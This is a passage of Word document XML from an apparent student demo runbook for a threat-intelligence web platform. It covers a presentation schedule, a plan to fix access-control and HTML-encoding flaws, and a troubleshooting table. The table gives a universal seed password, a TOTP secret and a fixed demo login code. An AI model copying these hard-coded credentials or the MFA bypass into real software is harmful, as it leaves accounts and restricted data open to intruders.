                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Terminal output showing 5/5 passing vulnerability tests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13:00 - 14:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Platform Regression Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>In Terminal 2, run 'npm test'. Show 53/53 tests passing across 10 test suites.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'To guarantee software stability, our platform is verified by 53 automated unit and integration tests covering security, cryptographic, and API boundaries with zero failures.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Terminal test runner output showing 53 passed, 0 failed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14:00 - 15:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>M12 Remediation Roadmap &amp; Q&amp;A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Explain planned M12 secure refactoring: canAccessTLP check for V02 and HTML entity encoding for V04.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'In Milestone M12, we will refactor reportController.js to enforce 403 Forbidden on TLP:RED access and implement strict HTML entity encoding. I am now ready for your questions.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Word report cover page &amp; Traceability Matrix table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECTION 5 — TROUBLESHOOTING &amp; DIAGNOSTIC GUIDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This section provides the safest diagnostic commands and resolution procedures for common operational issues encountered during live demonstrations.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2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Issue Encountered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Likely Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Diagnostic Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Safe Resolution Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Application does not start (EADDRINUSE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Port 3000 is occupied by a previously running background process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>netstat -ano | findstr :3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Kill the hanging process: taskkill /F /PID &lt;PID&gt;, then re-run npm start.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing package.json (ENOENT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Terminal is in personal directory (e.g., C:\Users\ABI) instead of project root.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Switch to project directory: cd /d v:\SSE-ENDSEM, then run npm start.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Database not initialized / Missing tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQLite database file was deleted or permissions denied in data/ directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dir data\cti_platform.sqlite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Wipe and re-seed cleanly: Remove-Item data\cti_platform.sqlite* -Force; npm start.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Login fails with 401 Unauthorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Incorrect password entered (SQLite is seeded with 'Password123!').</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqlite3 data/cti_platform.sqlite "SELECT username, role FROM users;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ensure password entered is 'Password123!' (the universal seed password).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TOTP verification fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Temporary challenge token expired (5m TTL) or invalid code entered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>node -e "console.log(require('./src/services/totpService').getTOTPCode('JBSWY3DPEHPK3PXQ'))"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use lab demo code '123456' or auto-calculated code within the 30-second window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Triage queue displays 403 Access Denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Signed-in persona is ROLE_CONTRIBUTOR or ROLE_CONSUMER instead of ROLE_ANALYST.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Check user chip in header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
